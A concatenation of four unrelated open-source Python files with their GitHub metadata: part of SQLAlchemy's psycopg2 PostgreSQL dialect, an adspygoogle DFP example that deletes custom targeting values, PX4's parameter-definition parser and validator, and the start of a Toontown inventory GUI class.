PGDialect.__init__(self, **kwargs)
self.server_side_cursors = server_side_cursors
self.use_native_unicode = use_native_unicode
self.use_native_hstore = use_native_hstore
self.supports_unicode_binds = use_native_unicode
self.client_encoding = client_encoding
if self.dbapi and hasattr(self.dbapi, '__version__'):
m = re.match(r'(\d+)\.(\d+)(?:\.(\d+))?',
self.dbapi.__version__)
if m:
self.psycopg2_version = tuple(
int(x)
for x in m.group(1, 2, 3)
if x is not None)
def initialize(self, connection):
super(PGDialect_psycopg2, self).initialize(connection)
self._has_native_hstore = self.use_native_hstore and \
self._hstore_oids(connection.connection) \
is not None
self._has_native_json = self.psycopg2_version >= (2, 5)
# http://initd.org/psycopg/docs/news.html#what-s-new-in-psycopg-2-0-9
self.supports_sane_multi_rowcount = self.psycopg2_version >= (2, 0, 9)
@classmethod
def dbapi(cls):
import psycopg2
return psycopg2
@util.memoized_property
def _isolation_lookup(self):
from psycopg2 import extensions
return {
'AUTOCOMMIT': extensions.ISOLATION_LEVEL_AUTOCOMMIT,
'READ COMMITTED': extensions.ISOLATION_LEVEL_READ_COMMITTED,
'READ UNCOMMITTED': extensions.ISOLATION_LEVEL_READ_UNCOMMITTED,
'REPEATABLE READ': extensions.ISOLATION_LEVEL_REPEATABLE_READ,
'SERIALIZABLE': extensions.ISOLATION_LEVEL_SERIALIZABLE
}
def set_isolation_level(self, connection, level):
try:
level = self._isolation_lookup[level.replace('_', ' ')]
except KeyError:
raise exc.ArgumentError(
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s" %
(level, self.name, ", ".join(self._isolation_lookup))
)
connection.set_isolation_level(level)
def on_connect(self):
from psycopg2 import extras, extensions
fns = []
if self.client_encoding is not None:
def on_connect(conn):
conn.set_client_encoding(self.client_encoding)
fns.append(on_connect)
if self.isolation_level is not None:
def on_connect(conn):
self.set_isolation_level(conn, self.isolation_level)
fns.append(on_connect)
if self.dbapi and self.use_native_unicode:
def on_connect(conn):
extensions.register_type(extensions.UNICODE, conn)
extensions.register_type(extensions.UNICODEARRAY, conn)
fns.append(on_connect)
if self.dbapi and self.use_native_hstore:
def on_connect(conn):
hstore_oids = self._hstore_oids(conn)
if hstore_oids is not None:
oid, array_oid = hstore_oids
if util.py2k:
extras.register_hstore(conn, oid=oid,
array_oid=array_oid,
unicode=True)
else:
extras.register_hstore(conn, oid=oid,
array_oid=array_oid)
fns.append(on_connect)
if self.dbapi and self._json_deserializer:
def on_connect(conn):
extras.register_default_json(conn, loads=self._json_deserializer)
fns.append(on_connect)
if fns:
def on_connect(conn):
for fn in fns:
fn(conn)
return on_connect
else:
return None
@util.memoized_instancemethod
def _hstore_oids(self, conn):
if self.psycopg2_version >= (2, 4):
from psycopg2 import extras
oids = extras.HstoreAdapter.get_oids(conn)
if oids is not None and oids[0]:
return oids[0:2]
return None
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
if 'port' in opts:
opts['port'] = int(opts['port'])
opts.update(url.query)
return ([], opts)
def is_disconnect(self, e, connection, cursor):
if isinstance(e, self.dbapi.Error):
# check the "closed" flag. this might not be
# present on old psycopg2 versions
if getattr(connection, 'closed', False):
return True
# legacy checks based on strings. the "closed" check
# above most likely obviates the need for any of these.
str_e = str(e).partition("\n")[0]
for msg in [
# these error messages from libpq: interfaces/libpq/fe-misc.c
# and interfaces/libpq/fe-secure.c.
'terminating connection',
'closed the connection',
'connection not open',
'could not receive data from server',
'could not send data to server',
# psycopg2 client errors, psycopg2/conenction.h,
# psycopg2/cursor.h
'connection already closed',
'cursor already closed',
# not sure where this path is originally from, it may
# be obsolete. It really says "losed", not "closed".
'losed the connection unexpectedly',
# this can occur in newer SSL
'connection has been closed unexpectedly'
]:
idx = str_e.find(msg)
if idx >= 0 and '"' not in str_e[:idx]:
return True
return False
dialect = PGDialect_psycopg2
|
{
"content_hash": "d0db0d0bbbb9328033f58c182c995546",
"timestamp": "",
"source": "github",
"line_count": 523,
"max_line_length": 107,
"avg_line_length": 39.29445506692161,
"alnum_prop": 0.6351029147000146,
"repo_name": "michaelBenin/sqlalchemy",
"id": "25fafa59c63d9d5474d124f81208121430b18a81",
"size": "20792",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/dialects/postgresql/psycopg2.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""This example deletes custom targeting values for a given custom targeting
key. To determine which custom targeting keys and values exist, run
get_all_custom_targeting_keys_and_values.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
custom_targeting_service = client.GetService(
'CustomTargetingService', 'https://www.google.com', 'v201203')
key_id = 'INSERT_CUSTOM_TARGETING_KEY_ID_HERE'
filter_values = [{
'key': 'keyId',
'value': {
'xsi_type': 'NumberValue',
'value': key_id
}
}]
filter_statement = {'query': 'WHERE customTargetingKeyId = :keyId',
'values': filter_values}
# Get custom targeting values.
response = custom_targeting_service.GetCustomTargetingValuesByStatement(
filter_statement)[0]
values = []
if 'results' in response:
values = response['results']
print 'Number of custom targeting values to be deleted: %s' % len(values)
if values:
value_ids = [value['id'] for value in values]
action = {'type': 'DeleteCustomTargetingValues'}
filter_statement = {'query': 'WHERE customTargetingKeyId = :keyId '
'AND id IN (%s)' % ', '.join(value_ids),
'values': filter_values}
# Delete custom targeting keys.
result = custom_targeting_service.PerformCustomTargetingValueAction(
action, filter_statement)[0]
# Display results.
if result and result['numChanges'] > 0:
print 'Number of custom targeting values deleted: %s' % result['numChanges']
else:
print 'No custom targeting values were deleted.'
|
{
"content_hash": "a9049da2ada0b7b3a96ef90e687fcf3b",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 80,
"avg_line_length": 33.94827586206897,
"alnum_prop": 0.6785170137125445,
"repo_name": "donspaulding/adspygoogle",
"id": "66da2e90fd4f7207dff557761aed13ad089497a4",
"size": "2587",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201203/delete_custom_targeting_values.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3734067"
},
{
"name": "Shell",
"bytes": "603"
}
],
"symlink_target": ""
}
|
import sys
import re
import math
global default_var
default_var = {}
class ParameterGroup(object):
"""
Single parameter group
"""
def __init__(self, name):
self.name = name
self.no_code_generation = False #for injected parameters
self.params = []
def AddParameter(self, param):
"""
Add parameter to the group
"""
self.params.append(param)
def GetName(self):
"""
Get parameter group name
"""
return self.name
def GetParams(self):
"""
Returns the parsed list of parameters. Every parameter is a Parameter
object. Note that returned object is not a copy. Modifications affect
state of the parser.
"""
return sorted(self.params, key=lambda param: param.name)
class Parameter(object):
"""
Single parameter
"""
# Define sorting order of the fields
priority = {
"board": 9,
"short_desc": 8,
"long_desc": 7,
"min": 5,
"max": 4,
"unit": 3,
"decimal": 2,
# all others == 0 (sorted alphabetically)
}
def __init__(self, name, type, default = ""):
self.fields = {}
self.values = {}
self.bitmask = {}
self.name = name
self.type = type
self.default = default
self.category = ""
self.volatile = False
self.boolean = False
def GetName(self):
return self.name
def GetType(self):
return self.type
def GetDefault(self):
return self.default
def GetCategory(self):
return self.category.title()
def GetVolatile(self):
return self.volatile
def GetBoolean(self):
return self.boolean
def SetField(self, code, value):
"""
Set named field value
"""
self.fields[code] = value
def SetEnumValue(self, code, value):
"""
Set named enum value
"""
self.values[code] = value
def SetBitmaskBit(self, index, bit):
"""
Set named enum value
"""
self.bitmask[index] = bit
def SetVolatile(self):
"""
Set volatile flag
"""
self.volatile = True
def SetBoolean(self):
"""
Set boolean flag
"""
self.boolean = True
def SetCategory(self, category):
"""
Set param category
"""
self.category = category
def GetFieldCodes(self):
"""
Return list of existing field codes in convenient order
"""
keys = self.fields.keys()
keys = sorted(keys)
keys = sorted(keys, key=lambda x: self.priority.get(x, 0), reverse=True)
return keys
def GetFieldValue(self, code):
"""
Return value of the given field code or None if not found.
"""
fv = self.fields.get(code)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv
def GetEnumCodes(self):
"""
Return list of existing value codes in convenient order
"""
return sorted(self.values.keys(), key=float)
def GetEnumValue(self, code):
"""
Return value of the given enum code or None if not found.
"""
fv = self.values.get(code)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv
def GetBitmaskList(self):
"""
Return list of existing bitmask codes in convenient order
"""
keys = self.bitmask.keys()
return sorted(keys, key=float)
def GetBitmaskBit(self, index):
"""
Return value of the given bitmask code or None if not found.
"""
fv = self.bitmask.get(index)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv.strip()
class SourceParser(object):
"""
Parses provided data and stores all found parameters internally.
"""
re_split_lines = re.compile(r'[\r\n]+')
re_comment_start = re.compile(r'^\/\*\*')
re_comment_content = re.compile(r'^\*\s*(.*)')
re_comment_tag = re.compile(r'@([a-zA-Z][a-zA-Z0-9_]*)\s*(.*)')
re_comment_end = re.compile(r'(.*?)\s*\*\/')
re_parameter_definition = re.compile(r'PARAM_DEFINE_([A-Z_][A-Z0-9_]*)\s*\(([A-Z_][A-Z0-9_]*)\s*,\s*([^ ,\)]+)\s*\)\s*;')
re_px4_parameter_definition = re.compile(r'PX4_PARAM_DEFINE_([A-Z_][A-Z0-9_]*)\s*\(([A-Z_][A-Z0-9_]*)\s*\)\s*;')
re_px4_param_default_definition = re.compile(r'#define\s*PARAM_([A-Z_][A-Z0-9_]*)\s*([^ ,\)]+)\s*')
re_cut_type_specifier = re.compile(r'[a-z]+$')
re_is_a_number = re.compile(r'^-?[0-9\.]')
re_remove_dots = re.compile(r'\.+$')
re_remove_carriage_return = re.compile('\n+')
valid_tags = set(["group", "board", "min", "max", "unit", "decimal", "increment", "reboot_required", "value", "boolean", "bit", "category", "volatile"])
# Order of parameter groups
priority = {
# All other groups = 0 (sort alphabetically)
"Miscellaneous": -10
}
def __init__(self):
self.param_groups = {}
def Parse(self, contents):
"""
Incrementally parse program contents and append all found parameters
to the list.
"""
# This code is essentially a comment-parsing grammar. "state"
# represents parser state. It contains human-readable state
# names.
state = None
for line in self.re_split_lines.split(contents):
line = line.strip()
# Ignore empty lines
if line == "":
continue
if self.re_comment_start.match(line):
state = "wait-short"
short_desc = None
long_desc = None
tags = {}
def_values = {}
def_bitmask = {}
elif state is not None and state != "comment-processed":
m = self.re_comment_end.search(line)
if m:
line = m.group(1)
last_comment_line = True
else:
last_comment_line = False
m = self.re_comment_content.match(line)
if m:
comment_content = m.group(1)
if comment_content == "":
# When short comment ends with empty comment line,
# start waiting for the next part - long comment.
if state == "wait-short-end":
state = "wait-long"
else:
m = self.re_comment_tag.match(comment_content)
if m:
tag, desc = m.group(1, 2)
if (tag == "value"):
# Take the meta info string and split the code and description
metainfo = desc.split(" ", 1)
def_values[metainfo[0]] = metainfo[1]
elif (tag == "bit"):
# Take the meta info string and split the code and description
metainfo = desc.split(" ", 1)
def_bitmask[metainfo[0]] = metainfo[1]
else:
tags[tag] = desc
current_tag = tag
state = "wait-tag-end"
elif state == "wait-short":
# Store first line of the short description
short_desc = comment_content
state = "wait-short-end"
elif state == "wait-short-end":
# Append comment line to the short description
short_desc += "\n" + comment_content
elif state == "wait-long":
# Store first line of the long description
long_desc = comment_content
state = "wait-long-end"
elif state == "wait-long-end":
# Append comment line to the long description
long_desc += "\n" + comment_content
elif state == "wait-tag-end":
# Append comment line to the tag text
tags[current_tag] += "\n" + comment_content
else:
raise AssertionError(
"Invalid parser state: %s" % state)
elif not last_comment_line:
# Invalid comment line (inside comment, but not starting with
# "*" or "*/". Reset parsed content.
state = None
if last_comment_line:
state = "comment-processed"
else:
tp = None
name = None
defval = ""
# Non-empty line outside the comment
m = self.re_px4_param_default_definition.match(line)
# Default value handling
if m:
name_m, defval_m = m.group(1,2)
default_var[name_m] = defval_m
m = self.re_parameter_definition.match(line)
if m:
tp, name, defval = m.group(1, 2, 3)
else:
m = self.re_px4_parameter_definition.match(line)
if m:
tp, name = m.group(1, 2)
if (name+'_DEFAULT') in default_var:
defval = default_var[name+'_DEFAULT']
if tp is not None:
# Remove trailing type specifier from numbers: 0.1f => 0.1
if defval != "" and self.re_is_a_number.match(defval):
defval = self.re_cut_type_specifier.sub('', defval)
param = Parameter(name, tp, defval)
param.SetField("short_desc", name)
# If comment was found before the parameter declaration,
# inject its data into the newly created parameter.
group = "Miscellaneous"
if state == "comment-processed":
if short_desc is not None:
if '\n' in short_desc:
raise Exception('short description must be a single line (parameter: {:})'.format(name))
if len(short_desc) > 150:
raise Exception('short description too long (150 max, is {:}, parameter: {:})'.format(len(short_desc), name))
param.SetField("short_desc", self.re_remove_dots.sub('', short_desc))
if long_desc is not None:
long_desc = self.re_remove_carriage_return.sub(' ', long_desc)
param.SetField("long_desc", long_desc)
for tag in tags:
if tag == "group":
group = tags[tag]
elif tag == "volatile":
param.SetVolatile()
elif tag == "category":
param.SetCategory(tags[tag])
elif tag == "boolean":
param.SetBoolean()
elif tag not in self.valid_tags:
sys.stderr.write("Skipping invalid documentation tag: '%s'\n" % tag)
return False
else:
param.SetField(tag, tags[tag])
for def_value in def_values:
param.SetEnumValue(def_value, def_values[def_value])
for def_bit in def_bitmask:
param.SetBitmaskBit(def_bit, def_bitmask[def_bit])
# Store the parameter
if group not in self.param_groups:
self.param_groups[group] = ParameterGroup(group)
self.param_groups[group].AddParameter(param)
state = None
return True
def IsNumber(self, numberString):
try:
float(numberString)
return True
except ValueError:
return False
def Validate(self):
"""
Validates the parameter meta data.
"""
seenParamNames = []
#allowedUnits should match set defined in /Firmware/validation/module_schema.yaml
allowedUnits = set ([
'%', 'Hz', '1/s', 'mAh',
'rad', '%/rad', 'rad/s', 'rad/s^2', '%/rad/s', 'rad s^2/m', 'rad s/m',
'bit/s', 'B/s',
'deg', 'deg*1e7', 'deg/s',
'celcius', 'gauss', 'gauss/s', 'gauss^2',
'hPa', 'kg', 'kg/m^2', 'kg m^2',
'mm', 'm', 'm/s', 'm^2', 'm/s^2', 'm/s^3', 'm/s^2/sqrt(Hz)', 'm/s/rad',
'Ohm', 'V',
'us', 'ms', 's',
'S', 'A/%', '(m/s^2)^2', 'm/m', 'tan(rad)^2', '(m/s)^2', 'm/rad',
'm/s^3/sqrt(Hz)', 'm/s/sqrt(Hz)', 's/(1000*PWM)', '%m/s', 'min', 'us/C',
'N/(m/s)', 'Nm/rad', 'Nm/(rad/s)', 'Nm', 'N',
'normalized_thrust/s', 'normalized_thrust', 'norm', 'SD',''])
for group in self.GetParamGroups():
for param in group.GetParams():
name = param.GetName()
if len(name) > 16:
sys.stderr.write("Parameter Name {0} is too long (Limit is 16)\n".format(name))
return False
board = param.GetFieldValue("board")
# Check for duplicates
name_plus_board = name + "+" + board
for seenParamName in seenParamNames:
if seenParamName == name_plus_board:
sys.stderr.write("Duplicate parameter definition: {0}\n".format(name_plus_board))
return False
seenParamNames.append(name_plus_board)
# Validate values
default = param.GetDefault()
min = param.GetFieldValue("min")
max = param.GetFieldValue("max")
units = param.GetFieldValue("unit")
if units not in allowedUnits:
sys.stderr.write("Invalid unit in {0}: {1}\n".format(name, units))
return False
#sys.stderr.write("{0} default:{1} min:{2} max:{3}\n".format(name, default, min, max))
if default != "" and not self.IsNumber(default):
sys.stderr.write("Default value not number: {0} {1}\n".format(name, default))
return False
# if default != "" and "." not in default:
# sys.stderr.write("Default value does not contain dot (e.g. 10 needs to be written as 10.0): {0} {1}\n".format(name, default))
# return False
if min != "":
if not self.IsNumber(min):
sys.stderr.write("Min value not number: {0} {1}\n".format(name, min))
return False
if default != "" and float(default) < float(min):
sys.stderr.write("Default value is smaller than min: {0} default:{1} min:{2}\n".format(name, default, min))
return False
if max != "":
if not self.IsNumber(max):
sys.stderr.write("Max value not number: {0} {1}\n".format(name, max))
return False
if default != "" and float(default) > float(max):
sys.stderr.write("Default value is larger than max: {0} default:{1} max:{2}\n".format(name, default, max))
return False
for code in param.GetEnumCodes():
if not self.IsNumber(code):
sys.stderr.write("Min value not number: {0} {1}\n".format(name, code))
return False
if param.GetEnumValue(code) == "":
sys.stderr.write("Description for enum value is empty: {0} {1}\n".format(name, code))
return False
for index in param.GetBitmaskList():
if not self.IsNumber(index):
sys.stderr.write("bit value not number: {0} {1}\n".format(name, index))
return False
if not int(min) <= math.pow(2, int(index)) <= int(max):
sys.stderr.write("Bitmask bit must be between {0} and {1}: {2} {3}\n".format(min, max, name, math.pow(2, int(index))))
return False
if param.GetBitmaskBit(index) == "":
sys.stderr.write("Description for bitmask bit is empty: {0} {1}\n".format(name, index))
return False
return True
def GetParamGroups(self):
"""
Returns the parsed list of parameters. Every parameter is a Parameter
object. Note that returned object is not a copy. Modifications affect
state of the parser.
"""
groups = self.param_groups.values()
groups = sorted(groups, key=lambda x: x.GetName())
groups = sorted(groups, key=lambda x: self.priority.get(x.GetName(), 0), reverse=True)
return groups
|
{
"content_hash": "13cada8703c6eafdad738308c7e86f40",
"timestamp": "",
"source": "github",
"line_count": 439,
"max_line_length": 156,
"avg_line_length": 41.65375854214123,
"alnum_prop": 0.46478180028437055,
"repo_name": "acfloria/Firmware",
"id": "7fadf9f7c3e233cc176567bca3d314f13be8a582",
"size": "18286",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/lib/parameters/px4params/srcparser.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3738677"
},
{
"name": "C++",
"bytes": "9489997"
},
{
"name": "CMake",
"bytes": "1106585"
},
{
"name": "EmberScript",
"bytes": "93414"
},
{
"name": "GDB",
"bytes": "41"
},
{
"name": "Groovy",
"bytes": "66180"
},
{
"name": "HTML",
"bytes": "5343"
},
{
"name": "MATLAB",
"bytes": "9938"
},
{
"name": "Makefile",
"bytes": "20040"
},
{
"name": "Perl",
"bytes": "11401"
},
{
"name": "Python",
"bytes": "1300486"
},
{
"name": "Shell",
"bytes": "301338"
}
],
"symlink_target": ""
}
|
from direct.gui.DirectGui import *
from panda3d.core import *
from toontown.toonbase.ToontownBattleGlobals import *
import InventoryBase
from toontown.toonbase import TTLocalizer
from toontown.quest import BlinkingArrows
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from toontown.toontowngui import TTDialog
class InventoryNewNEW(InventoryBase.InventoryBase, DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('InventoryNew')
PressableTextColor = Vec4(1, 1, 1, 1)
PressableGeomColor = Vec4(1, 1, 1, 1)
PressableImageColor = Vec4(0, 0.6, 1, 1)
PropBonusPressableImageColor = Vec4(1.0, 0.6, 0.0, 1)
NoncreditPressableImageColor = Vec4(0.3, 0.6, 0.6, 1)
PropBonusNoncreditPressableImageColor = Vec4(0.6, 0.6, 0.3, 1)
DeletePressableImageColor = Vec4(0.7, 0.1, 0.1, 1)
UnpressableTextColor = Vec4(1, 1, 1, 0.3)
UnpressableGeomColor = Vec4(1, 1, 1, 0.3)
UnpressableImageColor = Vec4(0.3, 0.3, 0.3, 0.8)
BookUnpressableTextColor = Vec4(1, 1, 1, 1)
BookUnpressableGeomColor = Vec4(1, 1, 1, 1)
BookUnpressableImage0Color = Vec4(0, 0.6, 1, 1)
BookUnpressableImage2Color = Vec4(0.1, 0.7, 1, 1)
ShadowColor = Vec4(0, 0, 0, 0)
ShadowBuffedColor = Vec4(1, 1, 1, 1)
UnpressableShadowBuffedColor = Vec4(1, 1, 1, 0.3)
TrackYOffset = 0.0
TrackYSpacing = -0.12
ButtonXOffset = -0.31
ButtonXSpacing = 0.18
def __init__(self, toon, invStr = None, ShowSuperGags = 1):
InventoryBase.InventoryBase.__init__(self, toon, invStr)
DirectFrame.__init__(self, relief=None)
self.initialiseoptions(InventoryNewNEW)
self.battleCreditLevel = None
self.detailCredit = None
self.__battleCreditMultiplier = 1
self.__invasionCreditMultiplier = 1
self.__respectInvasions = 1
self._interactivePropTrackBonus = -1
self.tutorialFlag = 0
self.gagTutMode = 0
self.showSuperGags = ShowSuperGags
self.clickSuperGags = 1
self.activeTab = 4
self.propAndOrganicBonusStack = config.GetBool('prop-and-organic-bonus-stack', 0)
self.propBonusIval = Parallel()
self.activateMode = 'book'
self.load()
self.hide()
return
def setBattleCreditMultiplier(self, mult):
self.__battleCreditMultiplier = mult
def getBattleCreditMultiplier(self):
return self.__battleCreditMultiplier
def setInteractivePropTrackBonus(self, trackBonus):
self._interactivePropTrackBonus = trackBonus
def getInteractivePropTrackBonus(self):
return self._interactivePropTrackBonus
def setInvasionCreditMultiplier(self, mult):
self.__invasionCreditMultiplier = mult
def getInvasionCreditMultiplier(self):
return self.__invasionCreditMultiplier
def setRespectInvasions(self, flag):
self.__respectInvasions = flag
def getRespectInvasions(self):
return self.__respectInvasions
def show(self):
if self.tutorialFlag:
self.tutArrows.arrowsOn(-0.4, -0.62, 90, -0.4, -0.62, 90, onTime=1.0, offTime=0.2)
if self.numItem(THROW_TRACK, 0) == 0:
self.tutArrows.arrow1.reparentTo(hidden)
else:
self.tutArrows.arrow1.reparentTo(self.battleFrame, 1)
if self.numItem(SQUIRT_TRACK, 0) == 0:
self.tutArrows.arrow2.reparentTo(hidden)
else:
self.tutArrows.arrow2.reparentTo(self.battleFrame, 1)
self.tutText.show()
self.tutText.reparentTo(self.battleFrame, 1)
DirectFrame.show(self)
def uberGagToggle(self, showSuperGags = 1):
self.showSuperGags = showSuperGags
for itemList in self.invModels:
for itemIndex in range(MAX_LEVEL_INDEX + 1):
if itemIndex <= LAST_REGULAR_GAG_LEVEL + 1 or self.showSuperGags:
itemList[itemIndex].show()
else:
itemList[itemIndex].hide()
for buttonList in self.buttons:
for buttonIndex in range(MAX_LEVEL_INDEX + 1):
if buttonIndex <= LAST_REGULAR_GAG_LEVEL or self.showSuperGags:
buttonList[buttonIndex].show()
else:
buttonList[buttonIndex].hide()
def enableUberGags(self, enableSG = -1):
if enableSG != -1:
self.clickSuperGags = enableSG
for buttonList in self.buttons:
for buttonIndex in range(LAST_REGULAR_GAG_LEVEL + 1, MAX_LEVEL_INDEX + 1):
if self.clickSuperGags:
pass
else:
self.makeUnpressable(buttonList[buttonIndex], self.buttons.index(buttonList), buttonIndex)
def hide(self):
if self.tutorialFlag:
self.tutArrows.arrowsOff()
self.tutText.hide()
DirectFrame.hide(self)
def updateTotalPropsText(self):
textTotal = TTLocalizer.InventoryTotalGags % (self.totalProps, self.toon.getMaxCarry())
if localAvatar.getPinkSlips() > 1:
textTotal = textTotal + '\n\n' + TTLocalizer.InventroyPinkSlips % localAvatar.getPinkSlips()
elif localAvatar.getPinkSlips() == 1:
textTotal = textTotal + '\n\n' + TTLocalizer.InventroyPinkSlip
self.totalLabel['text'] = textTotal
def unload(self):
self.notify.debug('Unloading Inventory for %d' % self.toon.doId)
self.stopAndClearPropBonusIval()
self.propBonusIval.finish()
self.propBonusIval = None
del self.invModels
self.buttonModels.removeNode()
del self.buttonModels
del self.upButton
del self.downButton
del self.rolloverButton
del self.flatButton
del self.invFrame
del self.levelsButton
del self.battleFrame
del self.purchaseFrame
del self.storePurchaseFrame
self.deleteAllButton.destroy()
del self.deleteAllButton
self.deleteEnterButton.destroy()
del self.deleteEnterButton
self.deleteExitButton.destroy()
del self.deleteExitButton
del self.detailFrame
del self.detailNameLabel
del self.detailAmountLabel
del self.detailDataLabel
del self.totalLabel
del self.activeTab
self.cleanupDialog()
for row in self.trackRows:
row.destroy()
del self.trackRows
del self.trackNameLabels
del self.trackBars
for buttonList in self.buttons:
for buttonIndex in range(MAX_LEVEL_INDEX + 1):
buttonList[buttonIndex].destroy()
del self.buttons
InventoryBase.InventoryBase.unload(self)
DirectFrame.destroy(self)
return
def cleanupDialog(self):
if self.dialog:
self.dialog.cleanup()
self.dialog = None
def load(self):
self.notify.debug('Loading Inventory for %d' % self.toon.doId)
invModel = loader.loadModel('phase_3.5/models/gui/inventory_icons')
self.invModels = []
offset = 0.0
for track in range(len(AvPropsNew)):
itemList = []
for item in range(len(AvPropsNew[track])):
itemList.append(invModel.find('**/' + AvPropsNew[track][item]))
self.invModels.append(itemList)
invModel.removeNode()
del invModel
self.buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
self.battleGui = loader.loadModel('phase_3.5/models/gui/battle_gui_new')
self.healRow = self.battleGui.find('**/healBar')
self.trapRow = self.battleGui.find('**/trapBar')
self.lureRow = self.battleGui.find('**/lureBar')
self.soundRow = self.battleGui.find('**/soundBar')
self.throwRow = self.battleGui.find('**/throwBar')
self.squirtRow = self.battleGui.find('**/squirtBar')
self.zapRow = self.battleGui.find('**/zapBar')
self.dropRow = self.battleGui.find('**/dropBar')
bars = [self.healRow, self.trapRow, self.lureRow, self.soundRow, self.throwRow, self.squirtRow, self.zapRow, self.dropRow]
self.battleCircle = self.battleGui.find('**/battleCircle')
self.tab = self.battleGui.find('**/whiteTab')
self.rowModel = self.buttonModels.find('**/InventoryRow')
self.rowModel = self.buttonModels.find('**/InventoryRow')
self.upButton = self.buttonModels.find('**/InventoryButtonUp')
self.downButton = self.buttonModels.find('**/InventoryButtonDown')
self.rolloverButton = self.buttonModels.find('**/InventoryButtonRollover')
self.flatButton = self.buttonModels.find('**/InventoryButtonFlat')
self.invFrame = DirectFrame(relief=None, parent=self)
self.levelsButton = None
self.battleFrame = None
self.purchaseFrame = None
self.storePurchaseFrame = None
trashcanGui = loader.loadModel('phase_3/models/gui/trashcan_gui')
self.deleteEnterButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDelete, TTLocalizer.InventoryDelete), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-1, 0, -0.35), scale=1.0)
self.deleteAllButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDeleteAll, TTLocalizer.InventoryDeleteAll), text_fg=(1, 0, 0, 1), text_shadow=(1, 1, 1, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-0.3, 0, -0.91), scale=0.75, command=self.__zeroInvConfirm)
self.deleteExitButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDone, TTLocalizer.InventoryDone), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-1, 0, -0.35), scale=1.0)
trashcanGui.removeNode()
self.deleteHelpText = DirectLabel(parent=self.invFrame, relief=None, pos=(0.272, 0.3, -0.907), text=TTLocalizer.InventoryDeleteHelp, text_fg=(0, 0, 0, 1), text_scale=0.08, textMayChange=0)
self.deleteHelpText.hide()
self.detailFrame = DirectFrame(parent=self.invFrame, relief=None, pos=(1.05, 0, -0.08))
self.circleFrame = DirectFrame(parent=self.detailFrame, relief=None, image=self.battleCircle, image_scale=0.25, pos=(0, 0, -0.25))
self.detailNameLabel = DirectLabel(parent=self.circleFrame, text='', text_scale=TTLocalizer.INdetailNameLabel, text_fg=(0.05, 0.14, 0.4, 1), scale=0.045, pos=(0, 0, 0.1), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None, image=self.invModels[0][0])
self.detailAmountLabel = DirectLabel(parent=self.circleFrame, text='', text_fg=(0.05, 0.14, 0.4, 1), scale=0.04, pos=(0, 0, -0.07), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailDataLabel = DirectLabel(parent=self.circleFrame, text='', text_fg=(0.05, 0.14, 0.4, 1), scale=0.03, pos=(0, 0, -0.1), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailCreditLabel = DirectLabel(parent=self.circleFrame, text=TTLocalizer.InventorySkillCreditNone, text_fg=(0.05, -0.14, -0.2, 1), scale=0.04, pos=(0, 0, 0.05), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailCreditLabel.hide()
self.totalLabel = DirectLabel(text='', parent=self.circleFrame, pos=(0, 0, 0.02), scale=0.05, text_fg=(0.05, 0.14, 0.4, 1), text_font=getInterfaceFont(), relief=None)
self.dialog = None
self.updateTotalPropsText()
self.trackRows = []
self.trackTabs = []
self.trackNameLabels = []
self.trackBars = []
self.buttons = []
for track in range(0, len(Tracks)):
trackTab = DirectButton(parent=self.invFrame, text=TextEncoder.upper(Tracks[track]), relief=None, scale=(0.5, 0.5, 0.5), pos=(-0.7 + offset, 0, -0.54), geom=self.tab, geom_color=(TrackColors[track][0] * 0.6,
TrackColors[track][1] * 0.6,
TrackColors[track][2] * 0.6,
1), text_font=ToontownGlobals.getInterfaceFont(), text_scale=TTLocalizer.INtrackNameLabels, text_pos=(0,0,0), text_align=TextNode.ACenter, command=self.doTab, extraArgs=[track], pressEffect=1)
offset += 0.2
trackFrame = DirectFrame(parent=self.invFrame, image=bars[track], scale=(1.0, 1.0, 1.0), pos=(0, 0, -0.7), state=DGG.NORMAL, relief=None)
